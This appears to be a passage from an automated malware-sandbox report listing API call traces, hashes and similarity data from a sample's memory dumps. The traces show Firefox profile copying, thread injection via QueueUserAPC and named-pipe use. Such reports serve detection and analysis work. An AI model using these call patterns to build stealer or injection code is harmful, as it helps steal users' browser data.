    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
  • RtlAllocateHeap.NTDLL(00000000,?,%APPDATA%\Mozilla\Firefox\Profiles), ref: 001C1CB3
  • mbstowcs.NTDLL ref: 001C1CC6
  • lstrcatW.KERNEL32(00000000,001EC804), ref: 001C1CD5
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C1CF9
  • RtlAllocateHeap.NTDLL(00000000,0000020C), ref: 001C1D0B
  • lstrcatW.KERNEL32(00000000,001E53C0), ref: 001C1D2D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C1D51
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
  • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 001C1D77
    • Part of subcall function 001C1B85: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1BC4
    • Part of subcall function 001C1B85: lstrcpyW.KERNEL32(00000000,001C1DC2), ref: 001C1BD5
    • Part of subcall function 001C1B85: CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1BEC
    • Part of subcall function 001C1B85: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1C05
    • Part of subcall function 001C1B85: CopyFileW.KERNEL32(?,00000000,00000000), ref: 001C1C34
    • Part of subcall function 001C1B85: HeapFree.KERNEL32(00000000,00000000), ref: 001C1C42
  • DeleteFileW.KERNEL32(?), ref: 001C1DC6
  • HeapFree.KERNEL32(00000000,?), ref: 001C1DD4
  • HeapFree.KERNEL32(00000000,?), ref: 001C1DF0
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: FindFirstFile$FindCloseFindNextFileWaitForSingleObjectmemset
  • String ID:
  • API String ID: 1787114350-0
  • Opcode ID: f51bd5130761bfcbb2dde5f7148bce543a8c4d605f388eb2cd72b1422ad7a0c5
  • Instruction ID: bd781be9b02a429d5c41947a9cf951fafe2009a97a88700872d728148f38a155
  • Opcode Fuzzy Hash: 9831CD22216EB4C3D517A5A94459779F901DF007D6F09FB11E9A2E04CD9DC35AB0FF18
  • Instruction Fuzzy Hash: bd781be9b02a429d5c41947a9cf951fafe2009a97a88700872d728148f38a155
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memset.NTDLL ref: 001D6FCE
  • FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
  • FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
  • FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
  • WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
  • FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 37
  • API ID: GetLastError$FreeLibraryGetProcAddressLoadLibraryRegCloseKeyRegOpenKey
  • String ID:
  • API String ID: 3176510729-0
  • Opcode ID: c06c93110e7f7b91b8af1b73fb1b0b90ed9f89153cfcabb1f297ed8ce1865d6a
  • Instruction ID: fcf1d727c95837e4298bacd4dfe6948e9c21b2cb80fe885b4227e83466d2943b
  • Opcode Fuzzy Hash: CCF097B98604C18EC212342048796E6BB04AF400C5A9C1762FE94042826F1531673B96
  • Instruction Fuzzy Hash: fcf1d727c95837e4298bacd4dfe6948e9c21b2cb80fe885b4227e83466d2943b
APIs
  • RegOpenKeyA.ADVAPI32(80000002,001E74AC,00000001), ref: 001DF43D
  • RegCloseKey.ADVAPI32(?), ref: 001DF4EE
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • LoadLibraryA.KERNEL32(00000000), ref: 001DF48B
  • GetProcAddress.KERNEL32(00000000,001ED2EE), ref: 001DF49D
  • GetLastError.KERNEL32 ref: 001DF4BC
  • FreeLibrary.KERNEL32(00000000), ref: 001DF4CE
  • GetLastError.KERNEL32 ref: 001DF4D6
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: CreateToolhelp32SnapshotGetModuleHandleGetProcAddressOpenThreadQueueUserAPCThread32FirstThread32Next
  • String ID:
  • API String ID: 1672352458-0
  • Opcode ID: 1aeb80c38cfc5c0a8cfd58ac1562df29def6d9c7c8df75773877e7a5eae794f0
  • Instruction ID: 2c1285140dd081ac5577a07b8dcb83313de7ecbc8bee00da9e77533937aa6cbe
  • Opcode Fuzzy Hash: D4E02064520567CFC21760B0915371EF90479A5CD5E1C777FF4A428E0B2E0731A7A375
  • Instruction Fuzzy Hash: 2c1285140dd081ac5577a07b8dcb83313de7ecbc8bee00da9e77533937aa6cbe
APIs
  • CreateToolhelp32Snapshot.KERNEL32 ref: 001CB391
  • GetModuleHandleA.KERNEL32(001EC01D,001ED067,00000004,00000000,00000000,00000000,00000001), ref: 001CB3A8
  • GetProcAddress.KERNEL32(00000000), ref: 001CB3AF
  • Thread32First.KERNEL32(001CD6FE,0000001C), ref: 001CB3BF
  • OpenThread.KERNEL32(001F03FF,00000000,00000000,001CD6FE,0000001C), ref: 001CB3DA
  • QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 001CB3EB
  • Thread32Next.KERNEL32(001CD6FE,0000001C), ref: 001CB3FB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: DeleteFileFindFirstFileFindNextFileGetLastErrorRemoveDirectory
  • String ID:
  • API String ID: 1089496181-0
  • Opcode ID: 404a45bcf307c79ebd751717ed0c922086e74df7a977f6731b91689120b89dc8
  • Instruction ID: 90ed9556279df49a0f93b6e45a9746ece17ae1501ae5ed02bf884558c7615ea3
  • Opcode Fuzzy Hash: 2401CBA3511DC96BEF83A1E06920BCBD444EF01270E8EE379A934204C54F00798B3B8F
  • Instruction Fuzzy Hash: 90ed9556279df49a0f93b6e45a9746ece17ae1501ae5ed02bf884558c7615ea3
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • FindFirstFileW.KERNEL32(?,00000000), ref: 001D7327
  • RemoveDirectoryW.KERNEL32(?), ref: 001D73A1
  • DeleteFileW.KERNEL32(?), ref: 001D73AC
  • FindNextFileW.KERNEL32(?,00000000), ref: 001D73BF
  • GetLastError.KERNEL32 ref: 001D73DA
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 120
  • API ID: GetLastError$CloseHandleCreateNamedPipeCreateThread
  • String ID:
  • API String ID: 1313248766-0
  • Opcode ID: 30add2293a1c4e7698607cd224a2cd89a7530f0af40c3b4cc732cba0ae1be137
  • Instruction ID: 4148eaee69a31b6fb3cd0b83f2f9e5c8e854a768ff6cb781906392e167196464
  • Opcode Fuzzy Hash: C6D0A7B057080ACAC517A130847936FABD5EFC51C1E8D0776F780B106F6B9731EA989E
  • Instruction Fuzzy Hash: 4148eaee69a31b6fb3cd0b83f2f9e5c8e854a768ff6cb781906392e167196464
APIs
  • CreateNamedPipeA.KERNEL32(40000003,00000004,000000FF,00000100,00000100,00000000,001EB0D8,079007F4), ref: 001CBED5
  • CreateThread.KERNEL32(00000000,00000000,001CBB92,00000000,00000000,?), ref: 001CBEEF
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CBF00
  • CloseHandle.KERNEL32(00000000), ref: 001CBF09
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CBF11
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 86
  • API ID: HeapFreeNtUnmapViewOfSectionRtlNtStatusToDosError
  • String ID:
  • API String ID: 3330954857-0
  • Opcode ID: 02a61448e217c9ef6f534c07a9fd427649efd77a8a877fb27eb9f5184da74e11
  • Instruction ID: 0644c66e21c54e57ba80f44bb6735bfe181557861a3a7a617ae7e4636646a487
  • Opcode Fuzzy Hash: 1CC02BB0481582C3B53F0CA2008E126ED45BAD32E0A0E1025E0083404CF5A3C7FCBF49
  • Instruction Fuzzy Hash: 0644c66e21c54e57ba80f44bb6735bfe181557861a3a7a617ae7e4636646a487
APIs
  • NtUnmapViewOfSection.NTDLL(079007F4), ref: 001CDCCE
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001CDCD5
  • HeapFree.KERNEL32(00000000,00000000,079007F4), ref: 001CDCE4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 106
  • API ID: HeapFree$RtlAllocateHeap$lstrlenwsprintf
  • String ID:
  • API String ID: 2041449020-0
  • Opcode ID: 540e5d8870bfb511a3d1955c9ad0a08f1ccba355172afbf88c2f817bd2b431a8
  • Instruction ID: bba761aa04d3bbfd698f0c8175b6501ca71d3289cc1fe08320dbb8ae1c2a3fdb
  • Opcode Fuzzy Hash: E33169710A8C82D6C42BA8D284B47BE9144B7C18D9C8D2B37FE583D0AD1F8321C66B92
  • Instruction Fuzzy Hash: bba761aa04d3bbfd698f0c8175b6501ca71d3289cc1fe08320dbb8ae1c2a3fdb
APIs
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C36C4
  • RtlAllocateHeap.NTDLL(00000000,00010000,001EC206), ref: 001C36E2
  • HeapFree.KERNEL32(00000000,?), ref: 001C3988
    • Part of subcall function 001CBE3C: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,001EB004,?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000), ref: 001CBE7C
    • Part of subcall function 001CBE3C: CloseHandle.KERNEL32(000000FF), ref: 001CBE87
  • HeapFree.KERNEL32(00000000,00000000,0000011A), ref: 001C3713
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800,001E53C8), ref: 001DDB9C
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32(?,00000000,00000001,001E53C8,00000002,?,?), ref: 001DDBB2
    • Part of subcall function 001DDB79: QueryPerformanceFrequency.KERNEL32(?), ref: 001DDC07
    • Part of subcall function 001DDB79: QueryPerformanceCounter.KERNEL32(?), ref: 001DDC11
    • Part of subcall function 001DDB79: _aulldiv.NTDLL(?,?,?,?), ref: 001DDC23
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDCEB
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32 ref: 001DDCFC
    • Part of subcall function 001DDB79: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DDD10
    • Part of subcall function 001DDB79: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DDD2E
    • Part of subcall function 001DDB79: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DDD60
    • Part of subcall function 001DDB79: lstrcpy.KERNEL32(?,001ED78A), ref: 001DDD85
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,?), ref: 001DDE1F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DDE2E
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,00000000), ref: 001DDE3F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,001ED78A), ref: 001DDE50
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000), ref: 001DDE5F
  • HeapFree.KERNEL32(00000000,001E53C8,0000011B), ref: 001C3788
    • Part of subcall function 001DDB3A: memcpy.NTDLL(001CD4DC,001CD4DC,00000000,001CD4DC,001CD4DC,001CD4DC,00000000,?,?,001C4CB1,00000000,00000001,00000000,001EC1F9,001CD4DC,00000000), ref: 001DDB5D
    • Part of subcall function 001D9692: memset.NTDLL ref: 001D96C0
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(?,001E53C4), ref: 001D9721
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9740
    • Part of subcall function 001D9692: _strupr.NTDLL ref: 001D9747
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(?,?), ref: 001D9754
    • Part of subcall function 001D9692: memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 001D979C
    • Part of subcall function 001D9692: lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 001D97BB
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C3800
  • wsprintfA.USER32 ref: 001C3815
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C3820
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C383A
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
  • RtlAllocateHeap.NTDLL(00000000,00000400,001EC206), ref: 001C38C8
  • wsprintfA.USER32 ref: 001C38DC
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C38E7
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3901
  • HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C3923
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C393E
  • wsprintfA.USER32 ref: 001C394E
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C3959
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3973
    • Part of subcall function 001C3ACC: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C3AE8
    • Part of subcall function 001C3ACC: lstrlen.KERNEL32(EMPTY,00000008,001EC4D7,00000000,0000010E,00000000,001C397E,?,?,001C397E), ref: 001C3B26
    • Part of subcall function 001C3ACC: HeapFree.KERNEL32(00000000,00000000,EMPTY), ref: 001C3B3D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 54
  • API ID: FindNextFileHeapFree$CloseHandleCompareFileTimeCreateFileGetFileTimeStrChrStrRChrlstrcatmemcpymemset
  • String ID: [FILE]$}nls
  • API String ID: 2232422578-3867520224
  • Opcode ID: d63c3d0b7d30395697a42598c95896d20b1220c6287163fcac3fa7287f978ce5
  • Instruction ID: 72ed0b863297d3488007a14820031ed271860468cbdb941106eaa0929c179687
  • Opcode Fuzzy Hash: C821E123044BD393D22369821181BA65755FB419E3C0C73F3E9BCB538D4F02A6CA6B96
  • Instruction Fuzzy Hash: 72ed0b863297d3488007a14820031ed271860468cbdb941106eaa0929c179687
APIs
  • memset.NTDLL ref: 001D9C3D
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D9C6F
  • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 001D9C83
  • CloseHandle.KERNEL32(00000094), ref: 001D9C9A
  • StrRChrA.SHLWAPI(00001000,00000000,0000005C), ref: 001D9CA6
  • lstrcat.KERNEL32(00001000,001EDA23), ref: 001D9CE0
  • FindNextFileA.KERNEL32(00000000,?), ref: 001D9D28
  • StrChrA.SHLWAPI(?,0000002E), ref: 001D9D96
  • memcpy.NTDLL(001EB1D4,?,00000000), ref: 001D9DCF
  • FindNextFileA.KERNEL32(00000000,?), ref: 001D9DE4
  • CompareFileTime.KERNEL32(?,?), ref: 001D9E0D
  • HeapFree.KERNEL32(00000000,001EB1D4), ref: 001D9E43
  • HeapFree.KERNEL32(00000000,00001000), ref: 001D9E53
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 75
  • API ID: GetLastError$CloseHandleCreateFileCreateFileMappingGetFileSizeGetTickCountHeapFreelstrcpylstrlen
  • String ID: Local\
  • API String ID: 100657750-422136742
  • Opcode ID: f69422c415cb778fefbc06e8825fe91035b8cc03ac1a89af78bf0cef88205365
  • Instruction ID: 66c49fc9188826551a13a81d8cc2f7c2edc845ab8f6028b8dc67af56f16d814c
  • Opcode Fuzzy Hash: 99F02E34B1854287E12374A1016077FDA04E7F20C4D8C7767ED453950A6F0278F7661B
  • Instruction Fuzzy Hash: 66c49fc9188826551a13a81d8cc2f7c2edc845ab8f6028b8dc67af56f16d814c
APIs
  • GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
  • CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
  • GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
    • Part of subcall function 001D937A: lstrlen.KERNEL32(00000000,00000000,?,00000027,?,001EB068,00000000), ref: 001D93B0
    • Part of subcall function 001D937A: lstrcpy.KERNEL32(00000000,00000000), ref: 001D93D4
    • Part of subcall function 001D937A: lstrcat.KERNEL32(00000000,00000000), ref: 001D93DC
  • GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
  • CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
  • lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
  • lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
  • GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
  • HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
  • CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 53
  • API ID: CloseHandleRegCloseKey$CreateEventDeleteFileGetLastErrorRegOpenKeyResumeThreadSetEventSleepSuspendThread
  • String ID:
  • API String ID: 1489053536-0
  • Opcode ID: a04800037acdc991d0ac410cda6be3e7e30f85b4b2334a738cde70afcf2a0bc8
  • Instruction ID: 36a5ddbc87084e266d50b713a62e435bbad551641728e73816c0b0ac65f44fd9
  • Opcode Fuzzy Hash: BB0104704685824B81277464983A3BADA15FF802D5D4D6366FE68B40895F8333DA3F27
  • Instruction Fuzzy Hash: 36a5ddbc87084e266d50b713a62e435bbad551641728e73816c0b0ac65f44fd9
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C17A8
  • CloseHandle.KERNEL32(001EAF58), ref: 001C1809
  • DeleteFileW.KERNEL32(00000000,?,?,?,?,00000000), ref: 001C1816
  • GetLastError.KERNEL32(?,?,?,00000000), ref: 001C1820
  • RegCloseKey.ADVAPI32(?,?,?,?,00000000), ref: 001C187D
  • RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 001C189C
  • SuspendThread.KERNEL32(00000000), ref: 001C18AA
  • CreateEventA.KERNEL32(001EB0D8,00000001,00000000), ref: 001C18BE
  • SetEvent.KERNEL32(00000000), ref: 001C18CB
  • CloseHandle.KERNEL32(00000000), ref: 001C18D2
  • Sleep.KERNEL32(000001F4), ref: 001C18E5
  • ResumeThread.KERNEL32(00000000), ref: 001C1909
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFree$GetCurrentThreadGetCurrentThreadIdRtlAllocateHeapRtlImageNtHeaderlstrlenwsprintf
  • String ID: W
  • API String ID: 3968678070-655174618
  • Opcode ID: 65c7814ccee3740933dfcccc29e4eab5d936ac043747db4873335771aa46cfd7
  • Instruction ID: 5d65c5167d05eb071b61c740fb2aa7fd16767ced16d889d5a98f858644bbd093
  • Opcode Fuzzy Hash: 8901B138088895A7C06790614063FBFD6017F822D0C4DF712F9693819E2F4372D35B57
  • Instruction Fuzzy Hash: 5d65c5167d05eb071b61c740fb2aa7fd16767ced16d889d5a98f858644bbd093
APIs
  • RtlImageNtHeader.NTDLL ref: 001C1A48
  • GetCurrentThreadId.KERNEL32 ref: 001C1A5E
  • GetCurrentThread.KERNEL32 ref: 001C1A6F
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C1966: lstrlen.KERNEL32(?,00000001,?,?,?,00000001,?,?), ref: 001C19D1
    • Part of subcall function 001C1966: HeapFree.KERNEL32(00000000,00000000), ref: 001C19F9
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C1AE3
  • HeapFree.KERNEL32(00000000,00000020,00000000), ref: 001C1AF3
  • RtlAllocateHeap.NTDLL(00000000,00000400), ref: 001C1B3F
  • wsprintfA.USER32 ref: 001C1B50
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C1B5B
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C1B75
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 183
  • API ID: lstrcpy$CoInitializeExCoUninitializePathFindExtensionShellExecuteExlstrlenmemsetwsprintf
  • String ID: <
  • API String ID: 1457465641-4251816714
  • Opcode ID: 36c43c169b7f4adfcc7eed8db55d242cf47c4c2cff2d35238d5400cc3024a577
  • Instruction ID: 3de0f454e75166d7dc89cb568257ea8f04ae800c90f99e8cafab956dcc2645f6
  • Opcode Fuzzy Hash: 93F078708B2E8BC1CD9158C9160535692C06F30E68E9C9B137824F966B6B20312C9F9D
  • Instruction Fuzzy Hash: 3de0f454e75166d7dc89cb568257ea8f04ae800c90f99e8cafab956dcc2645f6
APIs
  • memset.NTDLL ref: 01B32CEE
  • CoInitializeEx.OLE32(00000000,00000002), ref: 01B32CF9
  • PathFindExtensionW.SHLWAPI(00000000), ref: 01B32D14
  • lstrcpyW.KERNEL32(00000000,01B38224), ref: 01B32D29
  • lstrlen.KERNEL32(01B37494,?,?,?,?,?,?,?,?,?,?,01B318D7,?), ref: 01B32D46
  • lstrcpyW.KERNEL32(00000000,01B384B8), ref: 01B32D77
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • wsprintfW.USER32 ref: 01B32DAE
  • ShellExecuteExW.SHELL32(0000003C), ref: 01B32DE3
  • CoUninitialize.OLE32 ref: 01B32DF7
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 43
  • API ID: GetLastError$CloseHandleCreateFileGetModuleHandleGetWindowsDirectoryHeapFreeRtlAllocateHeapStrChrWriteFilewsprintf
  • String ID:
  • API String ID: 2627060994-0
  • Opcode ID: db8d6b5184187aba615ed9859a1217546e47d51c2a19850b1dde47917d77b9bd
  • Instruction ID: df8b16018d32c17adcafddecac367e62ad292682b52cd612f4b16c26ee5ce5b9
  • Opcode Fuzzy Hash: 00E05538564C02C3C4279AA888803BEDA41B3801C1E8E0212FA002A5BAAB0323C88F63
  • Instruction Fuzzy Hash: df8b16018d32c17adcafddecac367e62ad292682b52cd612f4b16c26ee5ce5b9
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 001C159D
  • GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,00000000,?,001C2CDE,00000094,00000000), ref: 001C15AF
  • StrChrA.SHLWAPI(00000000,0000003A), ref: 001C15BC
  • wsprintfA.USER32 ref: 001C15D0
  • CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 001C15E6
  • GetModuleHandleA.KERNEL32(00000000,00010000,?,00000000), ref: 001C15FF
  • WriteFile.KERNEL32(00000000,00000000), ref: 001C1607
  • GetLastError.KERNEL32 ref: 001C1615
  • CloseHandle.KERNEL32(00000000), ref: 001C161E
    • Part of subcall function 001C154D: RtlAdjustPrivilege.NTDLL(00000013,00000001,00000000,?), ref: 001C155B
    • Part of subcall function 001C154D: GetLastError.KERNEL32(?,001C2CD4), ref: 001C1572
  • GetLastError.KERNEL32(?,00000000,?,001C2CDE,00000094,00000000), ref: 001C162F
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C163F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 60
  • API ID: HeapFree$lstrlenmemcpy$RtlAllocateHeapSwitchToThreadlstrcpy
  • String ID:
  • API String ID: 732536130-0
